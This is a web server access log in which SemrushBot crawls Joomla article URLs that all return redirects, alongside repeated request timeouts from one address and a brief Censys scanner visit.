185.191.171.40 - - [08/Mar/2023:22:48:13 +0100] "GET /?Itemid=49&catid=7&fontstyle=f-smaller&id=57&lang=en&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.10 - - [08/Mar/2023:22:48:16 +0100] "GET /?Itemid=53&fontstyle=f-smaller&id=346&lang=fr&option=com_content&view=article HTTP/1.1" 302 565 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.39 - - [08/Mar/2023:22:48:44 +0100] "GET /?Itemid=11&catid=7&fontstyle=f-larger&id=28&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:48:48 +0100] "-" 408 1489 "-" "-"
185.191.171.37 - - [08/Mar/2023:22:49:46 +0100] "GET /index.php?Itemid=0&id=307&lang=fr&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [08/Mar/2023:22:50:02 +0100] "GET /?Itemid=53&catid=1&fontstyle=f-larger&id=441&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.43 - - [08/Mar/2023:22:50:16 +0100] "GET /?Itemid=0&catid=7&fontstyle=f-larger&id=49&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.38 - - [08/Mar/2023:22:50:50 +0100] "GET /index.php?Itemid=0&id=185&lang=en&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:51:05 +0100] "-" 408 1489 "-" "-"
212.129.37.175 - - [08/Mar/2023:22:51:27 +0100] "-" 408 1489 "-" "-"
185.191.171.22 - - [08/Mar/2023:22:52:11 +0100] "GET /?Itemid=0&catid=7&fontstyle=f-smaller&id=67&lang=en&option=com_content&view=article HTTP/1.1" 302 574 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [08/Mar/2023:22:53:22 +0100] "GET /?Itemid=14&catid=7&fontstyle=f-larger&id=62&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [08/Mar/2023:22:53:40 +0100] "GET /?Itemid&fontstyle=f-larger&id=360&lang=fr&option=com_content&view=article HTTP/1.1" 302 560 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:53:42 +0100] "-" 408 1489 "-" "-"
185.191.171.40 - - [08/Mar/2023:22:53:49 +0100] "GET /?Itemid=53&fontstyle=f-larger&id=235&lang=fr&option=com_content&view=article HTTP/1.1" 302 564 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.44 - - [08/Mar/2023:22:53:50 +0100] "GET /index.php?Itemid=5&catid=7&id=64&lang=fr&option=com_content&view=article HTTP/1.1" 302 557 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.38 - - [08/Mar/2023:22:54:02 +0100] "GET /?Itemid=0&fontstyle=f-larger&id=280&lang=en&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.25 - - [08/Mar/2023:22:54:07 +0100] "GET /index.php?Itemid=46&catid=7&id=56&lang=en&option=com_content&view=article HTTP/1.1" 302 556 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [08/Mar/2023:22:54:11 +0100] "GET /index.php?Itemid=53&catid=1&id=477&lang=fr&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.17 - - [08/Mar/2023:22:54:33 +0100] "GET /index.php?Itemid=53&catid=7&id=43&lang=fr&option=com_content&view=article HTTP/1.1" 302 557 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.14 - - [08/Mar/2023:22:54:39 +0100] "GET /index.php?Itemid=2&lang=fr&option=com_content&view=frontpage HTTP/1.1" 302 535 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.21 - - [08/Mar/2023:22:55:16 +0100] "GET /?Itemid=0&fontstyle=f-smaller&id=309&lang=en&option=com_content&view=article HTTP/1.1" 302 563 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:55:32 +0100] "-" 408 1489 "-" "-"
185.191.171.26 - - [08/Mar/2023:22:55:42 +0100] "GET /index.php?catid=7&id=39&lang=fr&option=com_content&view=article HTTP/1.1" 302 542 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:56:21 +0100] "-" 408 1489 "-" "-"
185.191.171.8 - - [08/Mar/2023:22:56:31 +0100] "GET /?Itemid=3&fontstyle=f-smaller&id=287&lang=fr&option=com_content&view=article HTTP/1.1" 302 564 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.37 - - [08/Mar/2023:22:56:57 +0100] "GET /?Itemid=53&catid=1&fontstyle=f-smaller&id=449%E2%8C%A9%3Dfr&lang=en&option=com_content&view=article HTTP/1.1" 302 606 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [08/Mar/2023:22:57:03 +0100] "GET /index.php?id=347&lang=fr&option=com_content&view=article HTTP/1.1" 302 531 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.33 - - [08/Mar/2023:22:57:12 +0100] "GET /index.php?Itemid&catid=7&id=49&lang=fr&option=com_content&view=article HTTP/1.1" 302 554 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [08/Mar/2023:22:57:42 +0100] "GET /?Itemid=14&catid=7&fontstyle=f-smaller&id=38&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.3 - - [08/Mar/2023:22:57:43 +0100] "GET /?Itemid=0&fontstyle=f-larger&id=168&lang=fr&option=com_content&view=article HTTP/1.1" 302 563 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [08/Mar/2023:22:58:02 +0100] "GET /?Itemid=14&catid=7&fontstyle=f-smaller&id=19&lang=en&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [08/Mar/2023:22:58:10 +0100] "GET /?Itemid=48&catid=7&fontstyle=f-smaller&id=22&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [08/Mar/2023:22:58:32 +0100] "GET /?Itemid&fontstyle=f-larger&id=318&lang=en&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:58:35 +0100] "-" 408 1489 "-" "-"
185.191.171.1 - - [08/Mar/2023:22:58:55 +0100] "GET /index.php?Itemid=45&catid=7&id=5&lang=fr&option=com_content&view=article HTTP/1.1" 302 555 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.20 - - [08/Mar/2023:22:59:18 +0100] "GET /index.php?Itemid=12&catid=7&id=23&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [08/Mar/2023:22:59:20 +0100] "GET /?fontstyle=f-larger&id=301&lang=fr&option=com_content&view=article HTTP/1.1" 302 547 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.12 - - [08/Mar/2023:22:59:26 +0100] "GET /?Itemid=3&fontstyle=f-larger&id=310&lang=fr&option=com_content&view=article HTTP/1.1" 302 560 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [08/Mar/2023:22:59:39 +0100] "GET /?Itemid=0&fontstyle=f-larger&id=321&lang=en&option=com_content&view=article HTTP/1.1" 302 562 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.21 - - [08/Mar/2023:22:59:44 +0100] "GET /index.php?Itemid=16&catid=7&id=23&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:59:58 +0100] "-" 408 1489 "-" "-"
185.191.171.20 - - [08/Mar/2023:23:00:00 +0100] "GET /?Itemid=50&catid=7&fontstyle=f-smaller&id=46&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [08/Mar/2023:23:00:13 +0100] "GET /?Itemid=53&fontstyle=f-larger&id=284&lang=fr&option=com_content&view=article HTTP/1.1" 302 565 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [08/Mar/2023:23:00:28 +0100] "GET /index.php?Itemid=0&id=370&lang=en&option=com_content&view=article HTTP/1.1" 302 543 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.21 - - [08/Mar/2023:23:00:57 +0100] "GET /index.php?Itemid=12&catid=7&id=64&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.40 - - [08/Mar/2023:23:01:08 +0100] "GET /index.php?Itemid=47&catid=7&id=55&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:23:01:14 +0100] "-" 408 1489 "-" "-"
185.191.171.44 - - [08/Mar/2023:23:02:04 +0100] "GET /?Itemid=49&catid=7&fontstyle=f-smaller&id=18&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.38 - - [08/Mar/2023:23:02:05 +0100] "GET /index.php?Itemid&id=354&lang=en&option=com_content&view=article HTTP/1.1" 302 542 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.16 - - [08/Mar/2023:23:02:25 +0100] "GET /index.php?Itemid=16&catid=7&id=32&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [08/Mar/2023:23:02:45 +0100] "GET /?Itemid=0&fontstyle=f-larger&id=301&lang=en&option=com_content&view=article HTTP/1.1" 302 562 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.36 - - [08/Mar/2023:23:02:49 +0100] "GET /?Itemid&catid=7&fontstyle=f-smaller&id=66&lang=fr&option=com_content&view=article HTTP/1.1" 302 572 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.23 - - [08/Mar/2023:23:03:06 +0100] "GET /index.php?id=311&lang=fr&option=com_content&view=article HTTP/1.1" 302 529 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.33 - - [08/Mar/2023:23:03:10 +0100] "GET /index.php?Itemid=47&catid=7&id=63&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.3 - - [08/Mar/2023:23:03:23 +0100] "GET /?Itemid=11&catid=7&fontstyle=f-larger&id=30&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:23:03:28 +0100] "-" 408 1489 "-" "-"
185.191.171.5 - - [08/Mar/2023:23:03:36 +0100] "GET /?fontstyle=f-larger&id=317&lang=fr&option=com_content&view=article HTTP/1.1" 302 548 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.17 - - [08/Mar/2023:23:04:04 +0100] "GET /?Itemid&fontstyle=f-larger&id=356&lang=en&option=com_content&view=article HTTP/1.1" 302 560 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:23:04:25 +0100] "-" 408 1489 "-" "-"
185.191.171.12 - - [08/Mar/2023:23:04:49 +0100] "GET /?Itemid=16&catid=7&fontstyle=f-smaller&id=51&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.45 - - [08/Mar/2023:23:05:48 +0100] "GET /index.php?Itemid=0&catid=7&id=61&lang=en&option=com_content&view=article HTTP/1.1" 302 556 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.45 - - [08/Mar/2023:23:05:54 +0100] "GET /?Itemid=14&catid=7&fontstyle=f-larger&id=36&lang=en&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:23:06:07 +0100] "-" 408 1489 "-" "-"
185.191.171.17 - - [08/Mar/2023:23:06:11 +0100] "GET /index.php?Itemid=0&catid=7&id=57&lang=fr&option=com_content&view=article HTTP/1.1" 302 556 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.43 - - [08/Mar/2023:23:06:24 +0100] "GET /index.php?Itemid&id=491&lang=fr&option=com_content&view=article HTTP/1.1" 302 543 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.25 - - [08/Mar/2023:23:06:27 +0100] "GET /index.php?Itemid=48&catid=7&id=51&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.14 - - [08/Mar/2023:23:06:45 +0100] "GET /index.php?Itemid=53&catid=1&id=434&lang=fr&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [08/Mar/2023:23:06:54 +0100] "GET /index.php?Itemid=5&catid=7&id=21&lang=fr&option=com_content&view=article HTTP/1.1" 302 557 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.33 - - [08/Mar/2023:23:07:25 +0100] "GET /?Itemid=50&catid=7&fontstyle=f-smaller&id=37&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.11 - - [08/Mar/2023:23:07:34 +0100] "GET /?Itemid=47&catid=7&fontstyle=f-smaller&id=5&lang=en&option=com_content&view=article HTTP/1.1" 302 574 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.20 - - [08/Mar/2023:23:07:53 +0100] "GET /?Itemid=0&fontstyle=f-smaller&id=158&lang=en&option=com_content&view=article HTTP/1.1" 302 564 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.39 - - [08/Mar/2023:23:08:20 +0100] "GET /?Itemid&fontstyle=f-smaller&id=360&lang=fr&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:23:08:21 +0100] "-" 408 1489 "-" "-"
212.129.37.175 - - [08/Mar/2023:23:08:51 +0100] "-" 408 1489 "-" "-"
185.191.171.42 - - [08/Mar/2023:23:09:29 +0100] "GET /index.php?Itemid&id=301&lang=fr&option=com_content&view=article HTTP/1.1" 302 542 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.45 - - [08/Mar/2023:23:10:11 +0100] "GET /?Itemid=11&catid=7&fontstyle=f-larger&id=27&lang=en&option=com_content&view=article HTTP/1.1" 302 574 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [08/Mar/2023:23:10:29 +0100] "GET /index.php?Itemid=46&catid=7&id=6&lang=en&option=com_content&view=article HTTP/1.1" 302 554 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.11 - - [08/Mar/2023:23:10:39 +0100] "GET /?Itemid=0&catid=8&fontstyle=f-larger&id=129&lang=fr&option=com_content&view=article HTTP/1.1" 302 577 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.12 - - [08/Mar/2023:23:10:46 +0100] "GET /index.php?Itemid&catid=7&id=36&lang=fr&option=com_content&view=article HTTP/1.1" 302 554 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.14 - - [08/Mar/2023:23:10:54 +0100] "GET /?Itemid=53&catid=7&fontstyle=f-larger&id=482&lang=en&option=com_content&view=article HTTP/1.1" 302 578 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:23:11:00 +0100] "-" 408 1489 "-" "-"
185.191.171.21 - - [08/Mar/2023:23:11:28 +0100] "GET /?Itemid=45&catid=7&fontstyle=f-smaller&id=24&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.8 - - [08/Mar/2023:23:11:32 +0100] "GET /index.php?Itemid=14&catid=7&id=19&lang=en&option=com_content&view=article HTTP/1.1" 302 556 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.3 - - [08/Mar/2023:23:11:35 +0100] "GET /?Itemid=0&fontstyle=f-smaller&id=184&lang=en&option=com_content&view=article HTTP/1.1" 302 564 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.3 - - [08/Mar/2023:23:11:51 +0100] "GET /index.php?Itemid=0&catid=1&id=231&lang=fr&option=com_content&view=article HTTP/1.1" 302 557 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.41 - - [08/Mar/2023:23:11:52 +0100] "GET /?Itemid=50&catid=7&fontstyle=f-larger&id=51&lang=fr&option=com_content&view=article HTTP/1.1" 302 574 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.21 - - [08/Mar/2023:23:12:14 +0100] "GET /?Itemid=16&catid=7&fontstyle=f-larger&id=28&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [08/Mar/2023:23:12:41 +0100] "GET /?Itemid=49&catid=7&fontstyle=f-smaller&id=21&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.37 - - [08/Mar/2023:23:13:07 +0100] "GET /?Itemid=53&fontstyle=f-smaller&id=256&lang=fr&option=com_content&view=article HTTP/1.1" 302 565 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.25 - - [08/Mar/2023:23:13:12 +0100] "GET /?Itemid&catid=7&fontstyle=f-larger&id=65&lang=fr&option=com_content&view=article HTTP/1.1" 302 572 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:23:13:15 +0100] "-" 408 1489 "-" "-"
212.129.37.175 - - [08/Mar/2023:23:13:18 +0100] "-" 408 1489 "-" "-"
185.191.171.23 - - [08/Mar/2023:23:13:27 +0100] "GET /?Itemid=50&catid=7&fontstyle=f-larger&id=33&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.39 - - [08/Mar/2023:23:13:36 +0100] "GET /?Itemid=11&catid=7&fontstyle=f-larger&id=463&lang=en&option=com_content&view=article HTTP/1.1" 302 578 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.7 - - [08/Mar/2023:23:14:01 +0100] "GET /index.php?Itemid=53&catid=1&id=443%E2%8C%A9%3Dfr&lang=fr&option=com_content&view=article HTTP/1.1" 302 586 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.16 - - [08/Mar/2023:23:14:20 +0100] "GET /?Itemid=14&catid=7&fontstyle=f-smaller&id=23&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [08/Mar/2023:23:14:27 +0100] "GET /index.php?Itemid=0&id=158&lang=fr&option=com_content&view=article HTTP/1.1" 302 546 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.43 - - [08/Mar/2023:23:15:19 +0100] "GET /?Itemid=46&catid=7&fontstyle=f-smaller&id=25&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.13 - - [08/Mar/2023:23:15:33 +0100] "GET /?Itemid=0&fontstyle=f-larger&id=319&lang=fr&option=com_content&view=article HTTP/1.1" 302 562 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [08/Mar/2023:23:15:51 +0100] "GET /index.php?Itemid=0&catid=7&id=32&lang=en&option=com_content&view=article HTTP/1.1" 302 556 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:23:15:54 +0100] "-" 408 1489 "-" "-"
185.191.171.21 - - [08/Mar/2023:23:15:54 +0100] "GET /index.php?Itemid=0&fontstyle=f-smaller&lang=en&option=com_xmap&sitemap=1 HTTP/1.1" 302 557 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.13 - - [08/Mar/2023:23:15:57 +0100] "GET /index.php?Itemid&catid=7&id=59&lang=fr&option=com_content&view=article HTTP/1.1" 302 554 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.38 - - [08/Mar/2023:23:16:27 +0100] "GET /?Itemid=0&fontstyle=f-larger&id=208&lang=fr&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.25 - - [08/Mar/2023:23:16:43 +0100] "GET /?Itemid&catid=7&fontstyle=f-smaller&id=33&lang=fr&option=com_content&view=article HTTP/1.1" 302 572 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.11 - - [08/Mar/2023:23:17:07 +0100] "GET /index.php?Itemid=0&id=280&lang=en&option=com_content&view=article HTTP/1.1" 302 544 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:23:17:44 +0100] "-" 408 1489 "-" "-"
167.94.145.57 - - [08/Mar/2023:23:17:52 +0100] "GET / HTTP/1.1" 302 402 "-" "-"
167.94.145.57 - - [08/Mar/2023:23:17:53 +0100] "GET / HTTP/1.1" 302 405 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.57 - - [08/Mar/2023:23:17:53 +0100] "PRI * HTTP/2.0" 400 415 "-" "-"
185.191.171.24 - - [08/Mar/2023:23:17:54 +0100] "GET /robots.txt HTTP/1.1" 302 441 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.37 - - [08/Mar/2023:23:17:54 +0100] "GET /?Itemid=53&catid=7&fontstyle=f-larger&id=58&lang=en&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:23:18:08 +0100] "-" 408 1489 "-" "-"
185.191.171.37 - - [08/Mar/2023:23:18:13 +0100] "GET /?Itemid=3&catid=1&fontstyle=f-smaller&id=490&lang=fr&option=com_content&view=article HTTP/1.1" 302 578 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.35 - - [08/Mar/2023:23:19:02 +0100] "GET /?Itemid=0&catid=7&fontstyle=f-smaller&id=52&lang=fr&option=com_content&view=article HTTP/1.1" 302 574 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [08/Mar/2023:23:19:10 +0100] "GET /index.php?Itemid=5&catid=7&id=38&lang=en&option=com_content&view=article HTTP/1.1" 302 557 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.14 - - [08/Mar/2023:23:19:37 +0100] "GET /index.php?Itemid&id=327&lang=en&option=com_content&view=article HTTP/1.1" 302 542 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:23:20:47 +0100] "-" 408 1489 "-" "-"
185.191.171.11 - - [08/Mar/2023:23:21:03 +0100] "GET /?Itemid=53&fontstyle=f-smaller&id=321&lang=fr&option=com_content&view=article HTTP/1.1" 302 565 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.22 - - [08/Mar/2023:23:21:05 +0100] "GET /index.php?Itemid=12&catid=7&id=7&lang=fr&option=com_content&view=article HTTP/1.1" 302 554 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [08/Mar/2023:23:21:14 +0100] "GET /?Itemid=46&catid=7&fontstyle=f-smaller&id=51&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.22 - - [08/Mar/2023:23:21:46 +0100] "GET /?Itemid=0&catid=8&fontstyle=f-smaller&id=115&lang=en&option=com_content&view=article HTTP/1.1" 302 578 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
